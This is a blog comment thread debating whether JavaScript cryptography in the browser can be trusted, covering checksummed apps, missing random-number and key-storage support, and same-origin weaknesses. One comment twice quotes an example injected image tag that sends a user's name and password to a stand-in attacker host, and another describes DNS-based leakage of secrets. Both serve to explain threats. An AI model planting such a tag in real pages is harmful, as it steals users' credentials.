        My guess is that you are saying I’m recommending server-side crypto over your JS crypto approach. I’m not doing that. If I were to recommend something, it would certainly be client-side crypto using a heavyweight app (e.g., PGP, maybe with the Enigmail plugin). I would not recommend someone use either your JS crypto note storage service or a hypothetical reimplementation of it using server-side crypto.

        If I had to choose one of the latter two options, I would very reluctantly recommend the server-side implementation. At least it would be obvious that the server is managing your password and files and makes no claims about “host-proof” security. (I know you don’t use that exact phrase, but you do say on your website “your notes are private because even cryptic.ly can’t read them.”)

      16. Hi Nate,

        sorry, but the trust model is NOT the same if done right. Example: Clipperz.

        Let me explain:

        1) You forgot about a simply solution to prevent loading additional malware JavaScript without breaking checksums: place everything inline.
        Details: The Clipperz app is completely Open Source, the checksum of the *running* application is known and *everything* is located within ONE file, even the graphics and language files are placed *inline*. !!!One file!!!
        This means that “Admin adds logging to SEKRIT_CRYPTO.js to debug something, sees user’s passphrase” is simply NOT possible without breaking the checksum (Note: the source code of clipperz is located in different files, for sure. But the index.html which runs the service will be created by the built process which merges all the contents of the different file into one, and the checksum of the result is known).

        2) Clipperz offers an offline copy. You can log-in and you”ll get the Clipperz-application and your encrypted dataset inline for read-only-offline usage. Cause the offline copy is by far faster, you normally want to use it daily and update it after you changed data online.

        This is a HUGE difference: it simply does not affect an offline-copy user, if clipperz was hacked and noone detected the new “img src=evil.example.com?user=…&pass=…” for a few hours or so (and this is very unlikely, cause – as said – a simple sha1 is enough and I’m sure a couple of users and Clipperz itself will do such checks more than once a day). Additionally, this attack won’t catch any user which checks the checksum before using Clipperz online.

        I won’t say that everything is perfect (because someone may break Clipperz silently and may find a *tricky* way to get into the database and manipulate the encrypted data-sets which are merged inline into the offline copy to get something like “img src=evil.example.com?user=…&pass=…” into the offline copy). But it is FAR better then “you have to trust the server and admin”. The clipperz model ensures:

        – If the database gets copied, the user’s data is encrypted
        – The user can easily check if the online version was compromised by generating a checksum. It works with clipperz cause every single bit of XHTML, JS, CSS and images (->base64!) is placed *inline*. I don’t have to rely on Same origin or stuff. If I do so before using it, I don’t have to trust the admin or the server security. The only thing which gets loaded is the encrypted data which is by far easier to check for the application itself if manipulated (cause this should make the data unuseable).
        – Clipperz is Open Source. I am able to run my own server. And I can trust myself. And I can trsut my servers security cause I also can check the checksum of the Clipperz of my own server.

        BTW: “Numerous libraries not maintained by cryptographers”… Marco did his final thesis in Numerical Analysis and was research fellow at the Parallel Algorithm Research Centre. I think he is able to get himself into crypto.

        Andreas (not related tp but interested in Clipperz)

      17. Andreas, since you were not part of this original thread, I’ll reply this once.

        On ONE file being an effective root of trust to checksum, the Clipperz website says:

        “An app developed with Ajax sends requests to the server in background and uses the power of DHTML to write updates to the page, i.e. it tends to not actually do page transitions, hence solving the problem of keeping a persistent key to perform crypto operations.”

        Also, the SHA-1 checksum on the Clipperz web page appears to be the same server that sends you the Javascript itself.

    3. Nate –

      You’ve interpreted that correctly. Until just now i don’t think i understood that weren’t actually recommending your implementation #2 (server side crypto) as a good one but, if you had been, it struck me as odd that you’d take issue to a random number generation service…

      I do also understand now that your opinion is that for users that cannot/will not install a heavy weight application there isn’t anything better to do.

      We may have to agree to disagree on this point as I know there are definitely improvements, no matter how small or difficult to implement, that can be offered to people now as an alternative to simply gmail’ing passwords and bank accounts around.

    4. Oohh, I completely missed that part:

      “Lennie – what makes you think Nate (and, for that matter, Thomas, and even me) don’t want to have the best crypto implementations possible? That is why we are spending our valuable time telling everyone not to use Javascript cryptography.”

      So what are you doing to get good crypto to the people ? Is their some kind of proposal I could read ?

      What I’m trying to say is, you have to have an alternative.

      Sorry for being so incredibly verbose before. :-)

      1. No. You do not have to have an alternative. That is not how the world works; nobody with software security evaluation experience would ever make that claim. Sometimes, the answer is simply: “there is no way to do this thing safely and the right answer is not to do it at all”. When you do it anyways, knowing that it’s flawed, simply out of pique, your actions border on unethical.

      2. Thomas –

        It’s really depressing, despite this fact that the *only actual technical* obstacle to doing a sound crypto implementation (Nate’s points 1-7) in the browser is lack of a CSPRNG and that this is trivially solved by providing a server based api originating from the same source as the js, that you would continue to say that ‘there no way’ to accomplish the task at hand.

        When a person does something possible, which is nonetheless very hard, it’s occasionally called ‘a service’ by the people who benefit.

        Honestly, all secret sharing techniques have built within them intractable problems: if you are so focused in impossible problems why not go to work figuring out how solve the issue that there is *no way possible* to prevent the authors of openssl or gnu-pgp from releasing a cleverly crafted version that would grab 1000s of passwords/passphrases before being detected… It would be as useful to real people as you insisting that a pile of cultural issues somehow made a different design pattern technically impossible which is *provably* not.

        Just stop and consider: the authors of *any* secret sharing program, the designers of any cryptographic protocol, etc, have the ability and knowledge to mount attacks which cannot be prevented. Period (one time pad excepted). If you take the position that javascript is authored anew on each request you have the same issue, of course, but there is nothing that compromises, *by definition*, the communication channel: it still requires malicious acts on the part of the software author to reveal people’s secrets. As Nate himself has carefully described: the chain of trust is the same but the implementation is very, very difficult to get right. Difficult != Impossible.

      3. I disagree that lack of the PRNG is the “only technical obstacle”. As I said, the browser is a poor environment for doing crypto. Beyond no PRNG, there is no keystore (cert/private key storage, access mediated by the browser user). So you have a fundamental missing feature that means the user has to 100% trust the server or code generated by the server to work with their private keys.

        With my hypothetical JS PGP bindings, the user can allow the server’s code to sign things on their behalf. But that’s not enough for a secure system. You also need a signature-binding standard where everyone agrees that some aspects of the script’s origin are tied up in the signature. This way a script run on coupon site X cannot have your browser sign “debit my bank account $1m” messages purporting to be for site Y.

        As you can see, there are fundamental security problems that need to be addressed before browser support for true JS crypto can be added. What people call “JS crypto” today is just clientside computation of arbitrary server-specified logic.

      4. Lennie – JS crypto is just a bad idea. I’m working on leakage-resilient cryptography (under Pietrzak, Google for “A leakage-resilient mode of operation”), which will hopefully make it easier to build hardware “crypto appliances” that cannot be broken with a side-channel attack. Think “smartcard”, or one of the tokens issued by many banks – they are pretty user-friendly, although not free. We are not in a stage to issue concrete proposals yet, though, and I’d be very surprised if we were the ones to come up with concrete proposals.

        ara.t.howard – that’s not nearly the only issue.

      5. Joachim.

        Let’s get this straight:
        I know I don’t want to have javascript handle any calculations or other crypto-related operations, I would like to see an alternative though. I was asking if this works:

        – javascript or anything in ‘the page’ does not handle any plaintext, just encrypted data
        – the encrypting/decrypting is handled by the browser
        – some GUI-elements are added to the browser for the user
        – the browser shows the user the plain text, the rest of the page does not have any access to it. It might look similair to a textarea when the data is decrypted. Where the size of the text does not influence the size of the box on the page.
        – the browser has a key-storage, it contains the keys in encrypted form
        – the user needs a passprase to have the browser decrypt it and get the keys it needs to decrypt the data

        Now I’m not familair with what leakage means to crypto-people. When I read it I assumed you meant during crypto operations.

        But what I mentioned above doesn’t look much different from how crypto is handled with TLS (https) to me. Or how client-certificates for TLS (https) are handled.

        Or when you mentioned “leakage” did you mean leakage of the keys stored in the browser ? That’s why I mentioned: passprase.

        And to be honest everytime I see a smartcard implementation which is intended for widespread use they messed it up. These things don’t have the processing power to be secure (because everyone wants anything which is for widespread use to be cheap) and the industry seems to mess up the crypto every single time. Just have a look at the Public Transport card in the Netherlands, you should be familair with it.

        Maybe you know of a success story with these kinds of cards, every implementation where I looked at some of the details was a failed project.

      6. Nah, “leakage” (as I used it above) isn’t really present in the usual Javascript-webserver model. Leakage in the sense of “leakage-resilience” is about resistance to side-channel attacks, i.e. attacks that do not respect the black-box model commonly used in cryptography. As a concrete example, the power use of a smart card may be related to the key material. The best introduction to leakage-resilience (which is a mathematical way to try to prevent these attacks) that I’m aware of is my supervisor’s; note I’m probably biased.

        A better understanding of these issues may make it possible to achieve a better level of security and/or lower costs. Yes, I agree that hardware tokens are not nearly as secure as they could be, although quite a few banks do issue hardware tokens (which are at least good enough to earn back the investment) and things like the (pricey!) RSA SecureID tokens seem to stand up well to non-expert attackers. The Dutch OV-chipkaart doesn’t really prove anything except that stupidity gets you hacked.

        With respect to your actual question: is this comment a sufficient response (“you might be able to do it, under optimistic assumptions, but you’d have to forbid any way to make it even a little convenient”)? If not, I’m happy to consider other arguments or elaborate on my reasoning.

      7. Joachim –

        re: “that’s not nearly the only issue”

        actually, if you re-read Nate’s list you will see that his entire argument can be summed up by two points: first, the somewhat circular:

        “it’s really hard to write a good, safe, portable crypto lib in js and no one has done it yet, therefore it cannot be done”

        and the real, but solvable:

        “browsers have no csprng”

        it’s true that browsers don’t have them but, fortunately, getting random numbers from a same origin service safely is 30 minutes work. it is, however, true to say that ‘js cannot do it’. it is not true, however, to say this implies good crypto cannot be done in browser if one assumes the existence of a server side component.

        I understand your position, especially considering that your work requires you not to see a solution.

        Regards.

      8. This is absolutely not what I am saying. See my previous comment re: keystore for yet another problem that is impossible to solve in the current browser environment.

      9. A high-level library that looks promising:

        NaCl: DJB’s new crypto library

        I think the cryptographers that do contribute code are starting to learn how to do it better. Developers do not need a grab-bag of algorithms, they need protocols. GPG and OpenSSL are good examples of how to offer both, although the implementation of OpenSSL should not be repeated.

      10. ara.t.howard – I do agree that the lack of a PRNG can be overcome, if you ignore the problems with Javascript as a language/environment (including (4)). You don’t even need to connect back to the server: old-school crypto programs, including modern PuTTY, would make the user move their mouse over a rectangle or somesuch – you can get the randomness directly from the user.

        I’ll refrain from responding to the rest of your message.

  18. So many of these comments seem to be about what people want crypto to do for them. Virtually none of them — even Franke’s, from a person who knows crypto — seem to be based on what crypto can do.

    1. precisely right. software that can do nothing useful for people is good only for writing textbooks. people’s information is increasingly distributed, accessed remotely, and shared. it seems quite reasonable to solicit the best minds for how existing, or new, crypto techniques might be used to do this better, perhaps incrementally so. it seems reasonable that people will always talk about what they *want* software to do rather than what it already does. right?

      1. I *want* to poop nothing but Lucky Charms Purple Horseshoe marshmallows, but the phenomenon of human digestion is governed by scientific rules, not my whims and desires. What I’m saying is, “but wouldn’t it be awesome if Javascript could do XXX” isn’t pertinent; the question is, “what can it do?”.

      2. as it’s turing complete and downloaded over the internet i think it’s accurate to say that it *can* do anything any client software downloaded from the internet can do. as far as i am aware the discussion is about how reasonable it is to do so since we know that, on paper, it’s not impossible. probably the superlatives aren’t helping anyone figure that out… if you are 100% convinced that javascript is somehow not turing complete and that binary code downloaded over the internet is somehow fundamentally safer than scripting languages downloading into a sandbox then you won’t be able to contribute much…

      3. “On paper”, it is impossible.

        The current standardized JS browser environment has no crypto support so your argument about “but the language is turing complete” is beside the point. You don’t get secure keystorage from Turing-completeness.

      4. you do not need secure key storage…. the key can be aes encrypted in the browser (assuming that works ;-)) and stored on the server for later use. alternatively one could use aes encrypted html5 storage.

  19. Re: “getting random numbers from a same origin service safely is 30 minutes work”

    OK, so in order to do that you need (A) a solid concept of “same origin” identity and (B) a strongly authenticated channel in which to send them.

    In order to have (A), you need the absence of even the smallest website bugs and also for every resource in the entire browser tab to have been delivered via (B) from completely trusted parties.

    In order to have (B) you need a TLS channel authenticated with a valid server certificate for the correct server.

    If you presume the existence of properly functioning TLS, then you have also presumed the existence of strong encryption on all back-to-origin channels.

    So what are you proposing to do with client-side JS crypto and how is it more efficient or more secure than what can be done now?

    1. Marsh –

      You are correct, all from same host and all HTTPS, no HTTP of any type in fact…

      The contract between the server and end user, when JS crypto (also crypto on server but that is besides the point) is:

      “by doing the first layer of encryption (on plaintext) in the browser, out in the open for all to see, we are giving the users a *chance* to witness any attempts to hi-jack their passphrase, steal secrets, etc”

      the contract between the server and user, when JS crypto is not used, despite any encryption done on the server is:

      “by passing your passphrase over the secure channel for us to use on the backend you, the user, cannot possibly detect attempts to save your passphrase or sniff secrets”

      The trust model is the same but the ‘un-trust’ model is not: doing every thing on a server over a secure channel gives ZERO chance of an end user being able to detect an attack.

      In case you missed it I’m proposing

      1) 100% https and no cross domain anything whatsoever.

      2) all the normal encryption techniques employed on the server (pgp like one secret per message).

      3) an additional layer done in the browser to enable privacy between the user and the server.

      Before someone else jumps in and says something silly like “but the server can send down malicious js to log passwords” remember that malicious operations by authors or code providers can be an attack on ANY system including native client apps. Firefox, for example, could easily log every password of every site you ever visited by exploiting this same trust relationship – of course we all know this has happened with applications, sometimes just reporting system details, etc., but the argument is not academic: it does and will happen.

      1. The argument that “the server can send down malicious js” is not silly, and you haven’t provided any valid counterargument to it. Note that it may not be the intended server that is sending that JS, unless you’ve fixed all of the browser weaknesses, including user interface weaknesses, associated with 1). (If you know how to do that, please help! It’s a much more worthwhile project to concentrate on than Javascript crypto.)

        The fact that this is also true for client-side apps in current operating systems is not a valid counterargument, since that does not make it any less true for JS scripts. The proper conclusion is that operating systems need fixing in order that this is no longer true for client-side apps (which is possible, in principle).

  20. “by doing the first layer of encryption (on plaintext) in the browser, out in the open for all to see, we are giving the users a *chance* to witness any attempts to hi-jack their passphrase, steal secrets, etc”

    Take a hard, honest look at exactly how much that’s worth. In my opinion, and that of a few others around here, it’s worth approximately zero.

    Here’s why:

    Any additional “chance” to prevent these attacks is basically the data exfiltration problem. Although there’s and entire sub-industry (“DLP”) dedicated to addressing this, it’s basically an unsolved problem. There are systems that can probably block long lists of Social Security Numbers from accidentally being sent out in email, but trying to block a single password from leaving a network-attacked web browser? Forget it.

    It’s a classic example of a situation where there’s an asymmetric advantage in favor of the attacker. (Defender must succeed every time, attacker only needs to succeed once.) E.g., consider the knockout blow in the first round of the contest between PFC Bradley Manning (attacker) vs. “The Entire US Government” (defender). That contest reportedly took place on the defender’s home turf (a secure air-gapped facility) and involved hundreds of MB rather than just a single password or secret key using unsophisticated techniques.

    All it takes is short string of attacker-supplied Javascript for the entire same origin security to fall apart. Once that happens, it is not useful to talk about the “severity of the compromise”, you really are 100% pwned at that point. The browser security model is a total house of cards.

    Once an attacker succeeds in running that bit of script, all he needs is the tiniest covert channel to leak your short secret key out. It doesn’t even have to happen right now now over https, it could be arranged to happen at a later time without even running script! For example, the attacker could probably pre-cache resources which expire at some future time causing bits of plaintext to leak out via DNS queries that the browser makes as it assembles the page.

    These are actual real attacks that have been demonstrated, not just problems only “on paper” that get in the way of the wider use of crypto.

    I think the only logically defensible conclusion is that you have to keep that short string of attacker-supplied Javascript from executing, because once it does, it’s game over.

    Now, all that said, I might switch sides a little bit. :-) I have a friend who had (what sounded to me) like possibly a reasonable use of Javascript. I’ll see if he wants to describe it himself. But still, the only way its possibly reasonable is that it specifically avoids certain fundamental security claims.

    1. Sure, feel free to post the example. That’s the original request in this article anyway — applications that use JS in a way that adds something server-side crypto does not.

  21. I’ve temporarily turned on comment moderation since this discussion has run its course. Except for Daniel Franke (proof-of-work systems), no one has suggested a potential application where browser-based JS crypto as it stands today adds anything.

    If you do come up with something, post it and I’ll approve the comment. Thanks!

  22. Nate,

    Do you make any distinction in JS crypo “making sense” between javascript served with web sites versus javascript crypto that is part of a browser (firefox) extension?

    -Brien

    1. Does the browser extension use native libraries, such as NSS or OpenSSL? In that case, my concerns would be more in the area of “don’t create your own crypto protocol”, which applies to any language. If it doesn’t, then it is mostly the same as web-based JS but with less frequent updates.

      My overall concern with browser extensions is that they have a similar trust model as ActiveX, but Firefox does not have killbits yet. So you can expect similar growth pains.

      1. Firefox has a blocklisting mechanism that is similar to ActiveX killbits. The current list of blocked extensions is here.

        That said, blocklisting and killbits are arguably more of an ass-covering exercise rather than an effective mechanism to deal with the problem of exploitable extensions or ActiveX controls. There is however some work going on toward limiting the authority of future Firefox extensions, as part of the Jetpack project.

      2. Yeah, I wasn’t holding up ActiveX killbits as a shining example. It was more like “FF extensions have even less thought to revocation than ActiveX, and we all know how that turned out.”

        Glad to hear they’re working on it though.

      3. I’m not sure yet, it’s a work in progress.

        I’m building an application to (hopefully) improve password management and I’m considering browser integration.

        The weakness that I’m addressing is that all the password managers I’ve seen offer all-or-none type access. Once you unlock a database the entire database is susceptible to compromise by badware.

        My idea is to add another factor that must be used to unlock each individual password entry.

        I’m looking at adding this to the firefox password manager (via an extension), but after reading a lot of your gripes I’m left with the feeling that it is bad news to do this in a browser environment altogether and that it is way safer to use a native password manager app.

      4. I’ve started a thread on sci.crypt seeking comments on my design.

        I know your mantra of don’t create your own crypto protocol, but I’m not aware of any existing one that will apply to my problem.

        Again, you’ve sufficiently disuaded me from attempting to do this directly in firefox and I’m going to do it as an extension to the popular open source password manager KeePass.

        http://groups.google.com/group/sci.crypt/browse_thread/thread/1d8e705a4036f182#

      5. Getting advice is always a good start. You could solve this in Keepass with URL-matched password groups — don’t change the base encryption scheme, just make it easier to auto-select a database to unlock. Then partition groups of passwords into high/med/low security groups. It should be more of a usability and less of a crypto thing.

      6. Nate,

        Yeah, I though about that approach. My problem is that I’ve been using a password manager for a number of years and I’ve now got literally hundreds of passwords in the database. Maybe a dozen or two are banking related. In the degenerate case you’ve got a separate database for every password which basically turns into the scheme of remembering the passwords for each site in your head.

        This logic led me to the conclusion that I must introduce another independent device into the picture. Being a reader of yours I appreciate the wisdom of not creating your own protocols, but I really don’t know of anything that mirrors the requirements of this problem.

        Thanks,
        Brien

  23. Unhosted web apps have central per-app source code, but decentralized per-user storage resources. From the browser, they use Cross-Origin Resource Sharing (CORS) to store data on the per-user hosts. The app encrypts and signs this data before it leaves the browser, so that the per-user host doesn’t get to see or modify the contents (that way, you can use commodity hosting for the per-user resources).

    The app’s home domain only provides flat files, it doesn’t do any server-side processing (we want to make it feasible to publish successful open source web apps on only a few cheap statics servers). This is why we use in-browser JS crypto.

    Several people have suggested that this is a legitimate use of JS crypto, and as such an exception to your excellent blogpost, but we would like to hear your opinion about this. Many thanks!

    1. I believe the entire article applies. This is just the secure note-taker app I used as an example but with storage on a different host than your code server.

      1. Oh, yes, I wasn’t saying that the disadvantages of js crypto (poor code maturity, flaky environment, etc.) magically stop existing for us. Only that we have a legitimate reason to put up with them.

        The code server only server flat files and no dynamic content (no server-side processing), which is why we have to rule it out for the role of en-/decryptor.

        The storage node is the one we don’t entirely trust, so also ruled out.

        That means en-/decryption has to happen on the client device. For argument’s sake, assume that the end-user doesn’t have administrator privileges on the client device (maybe it’s an internet cafe), then installing a desktop app or browser plugin is also impossible.

        That leaves you with two options: if you’re using Mozilla, the browser’s crypto object. For other browsers: pure-JS crypto.

        As I said, I acknowledge the disadvantages of js crypto that you list: even SJCL is at best immature, there are too many underlying platforms, the DOM and other environment elements can’t be trusted, there’s no good prng, and you can’t audit code that is downloaded every time and may be cached. All of this is true for unhosted web apps, and we’re trying to make the best of it, while knowing it’s not perfect.

        I’m only saying that, unlike in a normal ‘hosted software’ situation (where you can easily move the encryption to the server), we do not have any alternative place to move the crypto to.

      2. Ok, thanks for the clarification. Perhaps we agree on this: given your choice to constrain your platform to pure-JS in the browser, you’re doing the best you can.

        On the other hand, if you provided a native executable for Windows, Mac, and Linux (and the Mac/Linux-based phones), you could build something a lot like Freenet with no server-side crypto either.

  24. When you encrypt data, that means you think an attacker is listening to your traffic. If they’re listening to it, then something is wrong already. Adding javascript to a clear stream won’t help – they can just modify it. Adding javascript to an ssl-protected stream doesn’t add security if it’s encrypted already.

Comments are closed.